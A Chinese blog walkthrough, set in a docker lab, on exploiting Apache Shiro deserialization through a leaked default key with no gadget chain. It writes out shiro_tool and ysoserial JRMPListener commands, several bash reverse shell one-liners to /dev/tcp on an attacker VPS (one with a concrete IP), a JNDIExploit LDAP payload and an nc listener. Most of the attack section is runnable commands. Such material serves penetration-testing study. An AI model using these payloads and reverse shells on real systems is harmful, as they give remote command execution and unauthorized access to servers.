shiro泄露key无依赖链利用技巧

最新推荐文章于 2024-06-12 14:42:15 发布
最新推荐文章于 2024-06-12 14:42:15 发布
阅读量1.3k 收藏 8
点赞数 8
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/135525127
版权

获取环境:

拉取镜像到本地

$ docker pull medicean/vulapps:s_shiro_1

启动环境

$ docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

1.使用shiro_attack_2.2工具对目标系统进行检查,发现有默认key但是无利用链

image_ylgMY223mT.png

2.使用shior_tools.jar 直接对目标系统进行检测,检测完毕后会返回可执行操作

java   -jar  shiro_tool.jar http://10.11.10.108:8081/login.jsp 

2、选0让输入dnslog地址,通过dnslog测试有回显,这里有个注意点:使用 http://dnslog.cn/ 部分站点会拦截,可以换多个dnslog平台测试

image_htB_EhwPH9.png

dnslog有回显接下来就是拿shell了,这里由于固定思维,之前遇到的都是linux系统,先入为主觉得是Linux,结果没利用成功,一开始以为是防火墙拦截,后面探测了一下目录结构,发现是windows,所以这里payload要改变一下

3、在公网VPS上使用ysoserial开启端口,执行反弹命令

java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 "编码后bash命令"

 

image_wvD-c4KvV-.png

 这里面的编码的内容在步骤4

坑一:CommonsCollection1-5 如果不反弹shell,换着使用

4、bash反弹命令编辑

https://x.hacking8.com/java-runtime.html //编码的链接

下面三种执行命令,酌情选择:

坑二:这里执行的bash命令,首先要看对方运行系统,如果是linxu下面三个换着试,如果是win另行百度反弹命令。

bash -i >& /dev/tcp/VPSIP/7777 0>&1

/bin/bash -i > /dev/tcp/VPSIP/7777 0<&1 2>&1

0<&196;exec 196<>/dev/tcp/VPSIP/7777; sh <&196 >&196 2>&196

这里选择第二种,ip:是接受shell的vps的ip,端口:是vps用nc开启监听反弹到的端口

/bin/bash -i > /dev/tcp/192.168.14.222/8888  0<&1 2>&1

 

Windows:
java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"  
d2hvYW1p为命令的base64,这里是执行命令whoami

java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址

5、nc监听

6、输入接收shell的vps的ip和java-ysoserial-JRMPListener开启的端口(这里选择1,使用JRMPClient反弹shell)

 

7、执行成功,反弹shell

 

 

 

渗透测试中心
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Shiro key的另类检测方式
Vicl1fe的博客
11-04 1209
前言 很久以前对于Shiro这个洞,都是基于URLDNS来爆破key的,但实际利用场景中,大部分是不出网的,后来出了一个新的检测key的方式,但一直只知道是通过SimplePrincipalCollection这个类来判断的 正确的key就不会回显rememberMe=deleteMe, 错误的key就会回显rememberMe=deleteMe, 但原理未知,今天就来分析一下。 返回rememberMe=deleteMe的几种情况 key不正确 跟踪一下Shiro解密的逻辑,在AbstractReme
Apache shiro 反序列化及利用
qq_37561898的博客
04-27 3080
convertBytestoPrincipals 解密 --> 反序列化 decrypt 解密 函数需要通过key 解密 密钥值是固定的 触发反序列化流程:读取cookie -> base64解码 -> AES解密 -> 反序列化 DNS可以出网,使用dnslog进行攻击 结合Dnslog与URLDNS方法有一个前提是DNS能出网。那么在不出网的情况下就需要找一个替代的方案了。结合SQL盲注的思路,可以考虑执行如下代码结合时间延迟进行判断,若系统是lin..
Shiro依赖—Commons Beanutils
Le1a's Blog
03-23 7023
Shiro依赖—Commons Beanutils 文章首发自: https://www.le1a.com/posts/a5f4a9e3/ 前言 前面学习了CC6在Shiro当中的应用,但是很多场景没有使用CC依赖,那么还有其他利用方式吗?那就是Commons Beanutils! Commons Beanutils是什么? Commons-Beanutils是Apache提供的一个用于操作JAVA bean的工具包。里面提供了各种各样的工具类,让我们可以很方便的对bean对象的属性进行各种操作。 Ja
shiro defaultkey利用_深入利用Shiro反序列化漏洞
weixin_35734296的博客
01-06 3004
0x00:背景shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞,shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测和拦截。0x01:shiro反序列化的原理先来看看shiro在1.2.4版本反序列化的原理这里是shiro拿到cookie后的关键代码,先dec...
shiro反序列化生成KEY
m0_67392273的博客
08-24 369
Shiro反序列化时候的第一步需要猜KEY,此番操作就像遍历弱口令似的。
Shirokey但无回显利用子-JRMP大法
最新发布
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-12 788
shiro在手天下我有,扫出key直接梭哈getshell,横扫内网。但要是像这种情况,直接下班拜拜跑路,没有子玩毛线…直到出现了这么一个工具可以通过JRMP协议探测是否存在漏洞,很显然上面工具是做不到的,实战中很可能因此丢掉一个shell。
shiro依赖利用
jy13172的博客
07-23 688
我们只要调用它的另一个构造函数,然后调用JDK或者CB自带的类就行了,同时还要满足两个条件,一方面就是继承。我们上次用的CC3的依赖,这次把这个依赖删了,使用shiro自带的依赖打。是嵌套的意思 跟进去发现,readMethod是我们传进去的参数。CC是对java集合类的增强,CB是对JavaBean的增强。虽然是CC4中的类,但是我们在传入系统的时候就把他修改成。是可以动态加载类的,也就是可以代码执行,所以。是我们传的参数,这里很可能是一个可以利用的点。,而且优先队列的参数也是可以控制的。
第17篇:Shiro反序列化在Weblogic下无利用的拿权限方法
ABC_123的博客
07-02 2216
Part1 前言Shiro反序列化漏洞虽然出现很多年了,但是在平时的攻防比赛与红队评估项目中还是能遇到。主站也许遇不到Shiro漏洞,但是主站边缘域名、全资子公司的子域名、边缘资产、微信公众号、微信小程序啥的,总能找到。现在遇到的shiro反序列化漏洞也是越来越难了,好多都是别人搞不定的。搞不定的原因要么是key比较偏门,要么是过不了waf防护,要么就是找不到可用的利.........
Shiro使用官方方法生成密钥
m0_67391521的博客
03-28 1679
原文接:这里,这里! 0.前言 平台漏洞扫描,扫描到一堆安全问题,其中有个关于Shiro的。主要是说如果项目中shiro key为默认密钥或者网络公开密钥,就可以轻易的导致远程代码执行。 本文框架SSM+shiro。 1.解决思路 (1)升级Shiro版本,为1.7.0以上 (2)自定义一个base 64 AES密钥 (3)使用官方生成的方法提供密钥 本文选择的是第三种办法: 我们在shrio新建一个类。参照下面的代码进行添加: import javax.crypto.KeyGenerator; impo
shiro_key1200+.txt
03-10
shiro_key1200+.txtshiro_key1200+.txt
Apache shiro1.10.0依赖
10-25
Apache shiro1.10.0依赖
shiro-1.2.3所有依赖包以及源码
09-30
apache shiro 所有依赖包以及源码。
shiro权限验证依赖
09-02
shiro权限验证依赖包,所有要用到的都在这里的,方面使用
shiro无状态web集成的示例代码
08-29
本篇文章主要介绍了shiro无状态web集成的示例代码,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
200个shiro_key
weixin_46137328的博客
03-18 4042
0AvVhmFLUs0KTA3Kprsdag== 1AvVhdsgUs0FSA3SDFAdag== 1QWLxg+NYmxraMoxAXu/Iw== 1tC/xrDYs8ey+sa3emt...
shiro依赖利用及exp编写
Thunderclap的博客
02-08 1187
因为shiro是存在commons-beanutils的依赖的,这样我们可以通过构造原生的CB1的进行攻击shiro,但是我们通过ysoserial的CB1的会发现其实并不会成功。原因是因为CB1的里面其实是依赖于commons.collections包里面的部分内容的。如下发现是在我们构造BeanComparator的时候会调用,当没有显式传入Comparator 的情况下,则默认使用ComparableComparator。
heapdump泄露Shiro key从而RCE
渗透测试研究中心
12-05 4326
1. 简介我搭建了一个Spring heapdump泄露shiro key从而RCE的漏洞环境,Github地址:https://github.com/P4r4d1se/heapdump_shiro_vuln漏洞利用条件:Spring Shiro环境存在heapdump文件泄露存在可利用2. 漏洞原理Shiro相关的漏洞原理和调试分析已经有很多大佬分享过了,这里不再赘述,这里主要针对这个漏洞环...
Shiro授权缓存
Entodie的博客
09-04 628
1、授权和身份验证缓存关键点基本一样 不同点: 1、RedisCacheManager 创建授权和身份验证的名字key不同,但是Rediscache为同类不同对象,保存在currrentmap里面 2、保存在redis中的key不同: 授权keykeyprifix+principals 身份验证keykeyprifix+username ...
shiro反序列化利用
07-29
Shiro 反序列化利用是一种攻击技术,利用 Apache Shiro 框架中的漏洞,通过序列化和反序列化的过程来执行恶意代码。这种攻击方式通常被用来绕过身份验证和授权机制,获取未经授权的访问权限。 具体来说,攻击者可以构造一个恶意的序列化对象,然后将其发送给目标应用程序。当应用程序尝试反序列化这个对象时,恶意代码就会被执行,从而导致安全漏洞。 为了防止 Shiro 反序列化攻击,可以采取以下措施: 1. 更新 Shiro 框架:确保使用最新版本的 Shiro 框架,因为开发者通常会修复已知的漏洞。 2. 序列化过滤:限制应用程序接受的序列化对象的类型和来源。 3. 输入验证:对用户输入进行严格的验证和过滤,防止恶意数据进入应用程序。 4. 安全配置:配置 Shiro 的安全策略和权限控制,确保只有授权的用户能够访问敏感资源。 5. 日志监控:监控应用程序的日志,检测异常行为和潜在的攻击。 请注意,这只是一些基本的防御措施,具体的应对策略还需要根据具体的应用程序和环境来确定。建议在部署和使用 Shiro 框架时,与安全专家合作,并进行全面的安全评估和测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值